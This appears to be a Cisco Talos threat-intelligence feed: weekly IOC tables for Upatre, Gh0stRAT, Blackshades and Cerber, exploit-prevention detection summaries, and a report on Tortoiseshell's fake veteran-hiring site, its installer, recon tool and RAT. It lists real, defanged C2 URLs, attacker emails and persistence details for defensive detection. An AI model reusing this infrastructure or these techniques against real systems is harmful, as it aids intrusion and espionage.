21580ad6d39d4f863d8022706812586ef748d179974f3de5b3bae954192ac085 3885550e90bdbf469e3de0ed314b0bae355e5b531e63ebc2766100899de7e4f6 5364296fb8c7f23a30f12abaafdab87659050ae699d8eea17eca90b148959d21 593c32f771db8970231f0543e4b58bc978bbba4e2e6a0285303017040217c250 66a92f7dc4f6ad067ea257be7ceea59e89e5e5b7fccfe1808bb97db7e07741b4 6ff17284e9016804b80fe69d1f6efede80c398ac29986659fb11f5cc313b784c 7408cda78e127d3d8a7ba8b94b3b062a4a2e0e144fd15422c194dba4a2588ec2 7bf298822f352c0324495373ab984eaecb12f72277988c146496ce19e7e787ba 88fbd4fe4e2aa94375a7cd18305ef0f57722a5e83a468122e847711ebef1b4f1 a75930eb9955724aac62046b3fdff1d4b0c9ce834279915e18b44e2d290e7bde a90db1ec3e45cc03acbb2ee990ff8bd3815cb1c1ccb1ebb6ade227d4493a1d10 b3d349857cf2aa51d4781e02c414f8f34de52cd123b692b49303aaf1e9488822 dfb4eb5f09a31230bdfe457b3fd427b591b6700b62d0036a1d2380db9f464a92 ec1a87dde0b88b9a390439a57830e13063292378abc5c7c21c4fcd3e8054df28 f9cac38fde30e5c07840ec2fe6ca351d2e5f4da5fe4c8ddebd5bab3a51b83902 ff3902531d9310ea6c38cab19b575a88bcd44d9083430789f4cba4c79979193d

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WsaThis has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella




Win.Downloader.Upatre-7170342-1

Indicators of Compromise

IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
104[.]18[.]62[.]19219
104[.]18[.]63[.]1929
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
mmile[.]com28
Files and or directories createdOccurrences
%TEMP%\hfdfjdk.exe28
%TEMP%\ckjienn.exe28
%TEMP%\file.pe326
%HOMEPATH%\Downloads\invoice.exe4

File Hashes

053be505a2b2522fad8b7cb71f5bd04968cfb3ad5e77ad50eac80c71b9ad646d 06de4bdfc758de6336022f8301d692dcc17acbfc9663b367df86a02d528f2b90 09af6f559bcb42c006c0efc09f52dd592f459786c39780679d9d779998b6ecfd 0d2d5ff847cb20067e4213d78dcdf7aaa1c62546dcb00137b087d81703abddcc 21cc6498a5a9cecd5d0c3e94bddd4b182b8db1109268f7be061205fbdb91dfaf 2c1376de5d487cb0ea7be8b0f2710e3b205402bb78f20107a89711f8772120ac 3680339a0a4a8c411134b56dd25beb82b86e49e344d569beadd731d4e76d9cb5 3b24eaa42329d6abf6ce19c41738062797a2515122254b527fd5aec792723db6 3d16bedb9905e2ea113ccf8867502bb1b24d712234ef5a54257b8b3206e27479 43537dfd0609351d2e8d2e858aace8b0fb9ba89d301017a233fbd407f2ad39bd 455bf07f30cce22c8e45801258ea6ca480daed4537f50b2260bb372e784d6eaa 5458977721ca062b9d061190c01da20afc30e616b8264a9e88ef394039c476ed 5d4531531c698fa163199ee68a34661a212b69a93f43eff6d510e85f8663755c 6687eac3a15cb4e0e070ea5a72888644bfe05093e1e30a49b4e0a2a5a29d3d63 67b6cef58b9a052e1ae7994c930014a2ab045c3c7d856896747ceb3bff454c10 6fe8a7c6f231c9c8508879c983583810ea137d022b2d5b17b0213609f8a2f3e0 74f31384ed882520d99460a4583074e2269d3546f30fd08500a671e47f71519b 84e3298502bfa5ddfddc71f014eef7796ad4d1e11b5e40c52a65d3ac04771197 867bb45649adc9f5952e8944c0a4a2f256ed0875f52bd431212f5ade82d240f3 95ab1ac088f7be7dd71ecb6ea5c5923f4adbb05bd9480623ec788d6688ebae71 95cb3bbabe9d01355f0363f341b1a8d0d56b485e2b62c1111a0f68839c7d9c2e a0a861ff5549335dc76f9fd837e20073e23a2298b7e025615dfdbf0e00b0a91d a551656a575421e4cb87a7598846ab9436fb0bc7d9c7869edc8a4ca5d65ec105 b1aa0afb11da754c88e496a081982394a1ff8e6be6de0e54a11e27681095f8b1 beb20991985d1f3ea8654fdfb1e45824eed71a0abdff34ee1e3963a140a606ed
*See JSON for more IOCs

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
Wsa N/A

Screenshots of Detection

AMP


ThreatGrid




Win.Trojan.Gh0stRAT-7170222-1

Indicators of Compromise

Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Update_win
29
MutexesOccurrences
sanshuigood.vicp.cc3
222.186.56.113
rj.17caobi.com2
23.238.196.112
222.186.34.2001
\BaseNamedObjects\103.249.28.411
\BaseNamedObjects\174.139.211.141
\BaseNamedObjects\174.139.208.541
59.13.211.1611
67.229.57.2281
27.255.80.2061
220.70.90.331
rj.dxjav.com1
117.52.14.1521
67.198.139.2061
67.229.224.821
121.78.158.391
loloyasumi.com1
100.43.130.1301
98.126.240.1141
184.83.6.2051
174.139.208.511
183.86.218.1381
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
61[.]142[.]176[.]233
222[.]186[.]56[.]113
23[.]238[.]196[.]112
216[.]218[.]206[.]691
222[.]186[.]34[.]2001
103[.]249[.]28[.]411
174[.]139[.]211[.]141
174[.]139[.]208[.]541
59[.]13[.]211[.]1611
67[.]229[.]57[.]2281
27[.]255[.]80[.]2061
220[.]70[.]90[.]331
117[.]52[.]14[.]1521
67[.]198[.]139[.]2061
67[.]229[.]224[.]821
121[.]78[.]158[.]391
100[.]43[.]130[.]1301
98[.]126[.]240[.]1141
184[.]83[.]6[.]2051
174[.]139[.]208[.]511
183[.]86[.]218[.]1381
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
sanshuigood[.]vicp[.]cc3
rj[.]17caobi[.]com2
rj[.]dxjav[.]com1
loloyasumi[.]com1

File Hashes

0235f44dcc192d4a9388c9a209a8e28197be43afe382cd089b2445f15c4bfc7b 03e1d03b7ecc4dc2a4f781b83fb1d0677e885b995b96da937789ba594dfa6ba6 098522455fe96579b43408f37111f6064e2b564ff69e94f9808e01722e868c00 0b4a4f248629b27f3929e4a11186c35448c86921bd913dd5847a2c60ce430985 0f165051f607a0f289a8d9af17dec51cc9074134b70a766ae98293d08c8ae230 10609c1a910e9e71107cde6a3dc6f6ebcda7c2cb2a5775fe4e0217953f87c690 1d7dfe543d4ca35cfb162bf01e452c31240db8caa4452bb0fe5d382e730817d4 24bd88c9de5d9d09dc42a6b7338deb060c8444c1b57918a32d43739fa255247b 24fda94cdc7eb56af6fb5e6c39a85d9f80a1d622c4e3e5627bf30445b6b3a603 28bfbe60ce5013709c6e66d2aa96391dd260bdc3d6d7aa4dcd947ac79351a9e0 28c1255d7261e13d6a0f380267d43e190b1c54da127667591cda45844266265e 33d1367a9864cd8704db52626a5ff24d84ac74efd1414c371516b49a2bf73cb3 382ab955b1af78fba82e1209e6d61328d3100cb65f13be24615630dddf55af1a 383fed33d04f113938f2c21df9c7387e616ad4b528cb8d4dd6d0f8192ace729d 384583ac629ffbcb7a55da44910dd23cd380ce788bfae201c7ede3189959619f 38857b2a7f68193292de188f5ae07a1dc20cc8d9616a8fcfc8d7e56c9cb1342b 39027866667d05c74a96c42d98cd08b90a8f78dcfd88d3f28265a2dc5f1d1b7c 3b93d4215f033ae31063f5a790d6a139925a0e3a15f9e5ff32bf85b852eebcca 3c7c883d9cbfe7f0dc2a600e845becde9bf87898651ae475654fd79d37df5589 4bb16a15be32eb06a514619e851cca7a89b0e990c678192cd0a6329ac04dab5d 4c30fef1e3bb90050f8c874b92857e223179214a3c2e566da2c44dbf8b500d90 4c322440da73cf7b1152f3d62729cb4d8c2d8cefe8403743ca53283c33955689 51557a7629fe983488ac73c79717b97223c0babd9319916c3fbd575400eb09f0 51ae9265a88cf455a3143c022eea1e41038d3617f964ebf3f58310a9dfbacc33 68a9bf919b38f938938062e22852a3adebcca10973db9eb8172ee0e40e80fa34
*See JSON for more IOCs

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WsaThis has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella




Win.Packed.Blackshades-7168564-1

Indicators of Compromise

Registry KeysOccurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DoNotAllowExceptions
67
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\INSTALL 67
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 67
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS 67
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST 67
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\SRVID 67
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\SRVID\ID 67
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\INSTALL\DATE 67
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: Microsoft/HKCU
67
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Microsoft/HKCU
67
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Microsoft/HKCU
67
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{CFBEEEEF-8ABF-1A7E-7BED-B0ECEE1DB9AE}
Value Name: StubPath
67
<HKCU>\SOFTWARE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{CFBEEEEF-8ABF-1A7E-7BED-B0ECEE1DB9AE}
Value Name: StubPath
67
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\SRVID\ID
Value Name: 5FHDOAPLOK
67
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Users\Administrator\AppData\Roaming\Adobe.exe
67
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\INSTALL\DATE
Value Name: 5FHDOAPLOK
67
<HKCU>\SOFTWARE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{CFBEEEEF-8ABF-1A7E-7BED-B0ECEE1DB9AE} 66
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{CFBEEEEF-8ABF-1A7E-7BED-B0ECEE1DB9AE} 65
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS
Value Name: StubPath
3
<HKCU>\SOFTWARE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS
Value Name: StubPath
3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\TEMP\1a461072aa3e19bc429aa83c49ea31c7722213865cf50a6937b62776a54d8a7b.exe
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\TEMP\0cf04b4b65e7726e9d7d54f88299c4f1bbcad8aed4b586477c1bd7a48d21f318.exe
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\TEMP\1c5fa3c699edc2528a14eb7763db3064fdf8ea90e6d35c5bba8f82f786d995d5.exe
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\TEMP\3954af7bdbe570ff5c6fc1b7776b387a8b3a3d3bb57b0e187a9f4829b51c51cd.exe
1
MutexesOccurrences
5FHDOAPLOK67
\BaseNamedObjects\5FHDOAPLOK_pers35
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
212[.]117[.]50[.]22867
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
c2upfront[.]no-ip[.]info67
3c2upfront[.]no-ip[.]info67
2c2upfront[.]no-ip[.]info67
1c2upfront[.]no-ip[.]info67
5c2upfront[.]no-ip[.]info36
7c2upfront[.]no-ip[.]info36
4c2upfront[.]no-ip[.]info36
6c2upfront[.]no-ip[.]info36
Files and or directories createdOccurrences
\Autorun.ini67
E:\Autorun.ini67
%APPDATA%\Adobe.exe67
%TEMP%\vbc.exe67
%APPDATA%\Player67
%APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1568.32925889681
%APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1568.32994790951
%APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1184.32994877071
%APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1568.32994903591
%APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.948.32994884401
%APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1704.32994978471
%APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1704.32994975971
%APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1184.32995075501
%APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1704.32995069881
%APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1704.32995067541
%APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1568.32995156311
%APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1976.32995154281
%APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1568.32995255521
%APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.744.32995256931
%APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1704.32995357391

File Hashes

0061fdd7beb58e2d98dd6425c4467fabf84ee3261deed1ee41b3f09db77a3003 0103e022c0a56da31a998dab5f276be4bfa77e4b45e19d7e274e3ebfc6011794 020b795dc30a29af90cdf3d90213c74a9c1b18842077f48dc1cc824eefe52938 0435e4e9698ecdb041f392ee1e46204c64fa79151b028b9b3a938914a6348f7a 0444890807a5e1d7118896a2de574dd6ed48a0739ce371530ee15181336fe8ac 0581cf5e05f6f3a2148a8182cc6c753397d86eca85515c746a039a043c0156d3 0685f82e2301864e164b8ef4fb8e1f8a01540b3a87e5ca2b632be9b080446b9b 0835583f69abb28340d430ecc408e423c424a24a72a3a58e94a674e8a6880359 08c924b472ee439d357a811a209dac18bd337f5525d44c4a988158b51fb09feb 09898e7c85ce10d9f9e1d02c839b7b1b2c1a95826857854728b59548d0ea12f9 09a2f347ea8ca01153a1f53f668efcea8a85d98789abe0f4aebbbe83c72aed8c 09d34805c6ef60df465377aa7303c3edd19616aa3feba7051d8142f7020fc475 09d87c515a293798b1422625098e5a150c95e9a77e9b4f0207a9d3403fba1978 0a15b2293f794209b5190b12606d59fad342aa183d6a88aa841a70959cd5baf6 0bf4cdc4b180c5c4ceca11cb86be76a19a125ef097b94775a7f7c6b93d0d422f 0bf65a3c05256cb7fa901cfba4382f43032768c664dfab225ef504eda8b2667e 0c09b71359ae1c7358707eda957ae9e821d25e9c54ee9fba0d98a6cf22dcc77d 0c0e8ae82bff3013c7078798f6a9385262f42b27cdf6b89fe86e99aaaf49bd78 0c16e1bc2eece1ba2c3f590f7ea6a3cd32ae0cea789c6a2a066e85659b969107 0cb8b3dec2d52544e2adaf0e8be5765defaf8196fa93066d05f2e9db3ba0df5a 0cf04b4b65e7726e9d7d54f88299c4f1bbcad8aed4b586477c1bd7a48d21f318 0df2f3957a2a7793193ebcac0bd50db52c87f1062d41cb223dd621bbbe91362b 0f7d9402bc26786b576b5fdb6b60904f509bc643edd70ef3278652b7a716591d 0fbd9df4815f16405436ac36d5fe99ac0ae847cf3c0588534cd07d58bb918729 0fbe434942613ae5c6ea47d8abe73c86e898c6af97d89e802bb3ba5e5efc6647
*See JSON for more IOCs

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
Wsa N/A

Screenshots of Detection

AMP


ThreatGrid




Win.Ransomware.Cerber-7168312-0

Indicators of Compromise

Registry KeysOccurrences
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER 116
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER
Value Name: PendingFileRenameOperations
116
MutexesOccurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF}116
\BaseNamedObjects\shell.{CA0E5370-75D1-0D8C-179E-782353EA1E4D}16
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
178[.]33[.]163[.]254116
178[.]33[.]162[.]254116
178[.]33[.]160[.]254116
178[.]33[.]161[.]254116
178[.]33[.]160[.]224116
178[.]33[.]160[.]240116
178[.]33[.]162[.]192116
178[.]33[.]158[.]0116
178[.]33[.]159[.]0116
178[.]33[.]160[.]0116
178[.]33[.]160[.]128116
178[.]33[.]160[.]192116
178[.]33[.]160[.]248116
178[.]33[.]160[.]252116
178[.]33[.]161[.]0116
178[.]33[.]161[.]128116
178[.]33[.]161[.]192116
178[.]33[.]161[.]224116
178[.]33[.]161[.]240116
178[.]33[.]161[.]248116
178[.]33[.]161[.]252116
178[.]33[.]162[.]0116
178[.]33[.]162[.]128116
178[.]33[.]162[.]224116
178[.]33[.]162[.]240116
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
api[.]blockcypher[.]com116
bitaps[.]com79
chain[.]so79
BTC[.]BLOCKR[.]IO79
hjhqmbxyinislkkt[.]1j9r76[.]top37
bc-prod-web-lb-430045627[.]us-east-1[.]elb[.]amazonaws[.]com16
Files and or directories createdOccurrences
%TEMP%\d19ab989116
%TEMP%\d19ab989\4710.tmp116
%TEMP%\d19ab989\a35f.tmp116
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp116
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.bmp116
<dir>\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.txt116
<dir>\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.hta116
<dir>\<random, matching [A-Z0-9\-]{10}.[A-F0-9]{4}> (copy)16

File Hashes

0829786ae40c18d826631865dbd36bc72a5bf83855657316fa7b08221ff0f5cc 0e53d248a1e595deacef928a940792265e8f9e6e19aeedd6f15e9d3e77151ca3 0f1c4d1e75c4299391acc42ee6aeb7c37f662f49ddded5cda67b65e77c994590 116624dbb1103e20eb32786253daa919157862965ecee4a681ea6618b745297a 142a504ded2285194cc6d8a0d22ed667bb7e6755482b5a3781d21cff28a49f0c 166a7b7eb006ea685202b6fb866405290a8d881b1f17d8a713a8fba6019edf3a 1a21029006cd625a8eadf49354e1717d43d657eb185e905992a0b973813fe860 1ab97328ebfdaef12899218b558c1f0ec30495262794d0f6b4f4546aaa5e7e85 1d6782e87dbc95c0639bc44cd05bb172be993af6ba6cd5365f22f3e350a9f504 1ef0774c485c4921846551f9b2238804925ddb85fe9383202f94d313f8775528 220748f24923783182a2120dcd5a24799e799d13678ad58a117b064fe9f32d49 2424a1e17d890329fcb2926c40584a7f335cdcb6870f05eff82e2282fae8a3b4 24578d9dfad55c280b363ee5a37f71a1aa2f5cd1388dcc67097caf03ec973782 25e96af9b71863c16e25f18ef627347aab568f190fc71956fa63553f2b2f65a2 274fbe5faac90ea5ffef8e7b4b9da60642f040194c28dce7de4f9c30b92a7b07 2df15738f5c6d25d23d54d5d74d8ade3eea927152c3cad6307de580397d8b56f 301e0d38d0bac986fe185ab4e420a623bbbbf9103d767950a3dd678111354a8b 37b913abb385ae596b98a0366e4b33fac6e5dc6423bff07375e210774dd6d1ca 382b8aac516f52bcba3ca0dadae42e550e54bd18fee696d732aa59687c388992 38d4098a18344443ad15805810ba895ceefaf05be83f8ac2f53ea2f69ae7745d 3a523bb773df8f955d0ca81ee411b044692d8c24793cdaba348c2505fddcba09 3cc7d8e616d84ec21af5a3c60348f101a53c0a09257d0fdb4d7d15a4268e6330 3ff2ab9bdbfcc01eb114bf8cfa9ebb6b222b0572eddefb7b09b31e78a99bcdec 412f050b6b171f08875aa4ee5e54a0ec5b263cef01e27debc47324342f6ae188 42bff53fe89ff3b4bc908bfb53fbcb6dda006fed7d6cfb9ab04ce84dbd62f9c2
*See JSON for more IOCs

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
Wsa N/A

Screenshots of Detection

AMP


ThreatGrid



Malware




Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
CVE-2019-0708 detected - (11771)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Process hollowing detected - (2431)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Excessively long PowerShell command detected - (2353)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
Madshi injection detected - (1796)
Madshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique.
Kovter injection detected - (1465)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Trickbot malware detected - (688)
Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
Gamarue malware detected - (170)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Installcore adware detected - (95)
Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
Dealply adware detected - (46)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Fusion adware detected - (44)
Fusion (or FusionPlayer) is an adware family that displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware is known to sometimes download and install malware.

How Tortoiseshell created a fake veteran hiring website to host malware

$
0
0


By Warren Mercer and Paul Rascagneres with contributions from Jungsoo An.

Introduction

Cisco Talos recently discovered a threat actor attempting to take advantage of Americans who may be seeking a job, especially military veterans. The actor, previously identified by Symantec as Tortoiseshell, deployed a website called hxxp://hiremilitaryheroes[.]com that posed as a website to help U.S. military veterans find jobs. The URL is strikingly close to the legitimate service from the U.S. Chamber of Commerce, https://www.hiringourheroes.org. The site prompted users to download an app, which was actually a malware downloader, deploying malicious spying tools and other malware.

This is just the latest actions by Tortoiseshell. Previous research showed that the actor was behind an attacker on an IT provider in Saudi Arabia. For this campaign Talos tracked, Tortoiseshell used the same backdoor that it has in the past, showing that they are relying on some of the same tactics, techniques and procedures (TTPs).

Fake veteran hiring website


The fake website, called "Hire Military Heroes" (hxxp://hiremilitaryheroes[.]com/), which immediately goes after veterans with an image from the movie "Flags of our Fathers."


The website is only composed of three links to download a desktop app for free. The app is a fake installer. Contrary to standard malware installers, this one does not need to be silent, as the user expects an installation. Here's a look at the user interface, and the error message is always displayed to suggest something has "stopped" the app from accessing its database.



The progress bar almost fills up entirely, and then displays an error message:


The installer checks if Google is reachable. If not, the installation stops. If it is reachable, the installer downloads two binaries from hxxp://199[.]187[.]208[.]75/MyWS.asmx/GetUpdate?val=UID:



The downloaded binaries are stored in base64. One of the binaries is a tool used to perform a reconnaissance stage on the system and the second is the Remote Administrative Tool. The RAT is executed as a service. The installer installs the service first (for the -install argument) and then stops/starts the service with the command and control (C2) server IP in argument:



If something fails during the installation, an email is sent to the attacker. The credentials are hardcoded in the installer. The email account is ericaclayton2020@gmail[.]com and the error email is sent to marinaparks108@gmail[.]com.

Reconnaissance phase


The downloaded reconnaissance tool is named "bird.exe" on the system and the internal name is Liderc. Liderc is a unique supernatural being of Hungarian folklore. The original form of this creature is a chicken, that would explain the name of the dropped PE on the system, "Bird.exe."

The purpose is to collect a lot of information on the victim machine:








The attacker retrieves information such as the date, time and drivers. The attacker can then see information on the system, the patch level, the number of processors, the network configuration, the hardware, firmware versions, the domain controller, the name of the admin, the list of the account, etc. This is a significant amount of information relating to a machine and makes the attacker well-prepared to carry out additional attacks. The attacker even gets the size of the screen by using WMI, which is potentially a trick to identify if the system is a sandbox.

All this information is sent by email by using the same emails:



Remote access tool


This actor also deploys a RAT named "IvizTech" on the system. The code and features are similar to the ones outlined by Symantec. The IP is put in argument to the service. The attackers hoped that this would make it impossible to get to the C2, as the installer is needed — you can't just get there with the RAT itself. This allows an attacker to have a malware that they can add modules onto (no need to recompile when you want to update the C2). Requiring the installer also could make it more complicated for researchers to access the C2 and get hands-on analysis of the malware.

The malware has four features:

  • kill_me: It stops the service and removes the malware
  • Upload: It downloads a file on the internet
  • Unzip: It uses PowerShell to unzip and execute code on the system
  • And finally, the malware can execute a command

Conclusion


This new campaign utilizing the malicious hiring website represents a massive shift for Tortiseshell. This particular attack vector has the potential to allow a large swath of people to become victims of this attack. Americans are quick to give back and support the veteran population. Therefore, it's this website has a high chance of gaining traction on social media where users could share the link in the hopes of supporting veterans.

At the time of publication, we do not have a method of distribution used, nor do we have proof of this existing in the wild. The level of sophistication is low as the .NET binary used has poor OPSEC capabilities, such as hard-coded credentials, but then other more advanced techniques by making the malware modular and aware that the victim already ran it. There is a possibility that multiple teams from an APT worked on multiple elements of this malware, as we can see certain levels of sophistication existing and various levels of victimology.

Coverage


Intrusion prevention systems such as SNORT® provide an effective tool to detect Tortoiseshell activity due to specific signatures present at the end of each command. In addition to intrusion prevention systems, it is advisable to employ endpoint detection and response tools (EDR) such as Cisco AMP for Endpoints, which gives users the ability to track process invocation and inspect processes. Try AMP for free here.

Additional ways our customers can detect and block these threats are listed below.



Cisco Cloud Web Security (CWS) orWeb Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such asNext-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOCs


Network


hxxp://199[.]187[.]208[.]75/MyWS.asmx/GetUpdate?val=H7ddew3rfJid97fer374887sdnJDgsdte
hxxp://66[.]42[.]78[.]193/response/
hxxp://66[.]42[.]78[.]193/statement/
hxxp://hiremilitaryheroes[.]com/

Samples


Installers:

c121f97a43f4613d0a29f31ef2e307337fa0f6d4f4eee651ee4f41a3df24b6b5
2a9589538c563c006eaf4f9217a192e8a34a1b371a31c61330ce2b396b67fd10
55b0708fed0684ce8fd038d4701cc321fe7b81def7f1b523acc46b6f9774cb7b

Reconnaissance PE:

ec71068481c29571122b2f6db1f8dc3b08d919a7f710f4829a07fb4195b52fac

RAT:

51d186c16cc609ddb67bd4f3ecd09ef3566cb04894f0496f7b01f356ae260424

Additional IOCs related to this actor


41db45b0c51b98713bc526452eef26074d034b2c9ec159b44528ad4735d14f4a
78e1f53730ae265a7eb00b65fbb1304bbe4328ee5b7f7ac51799f19584b8b9d4
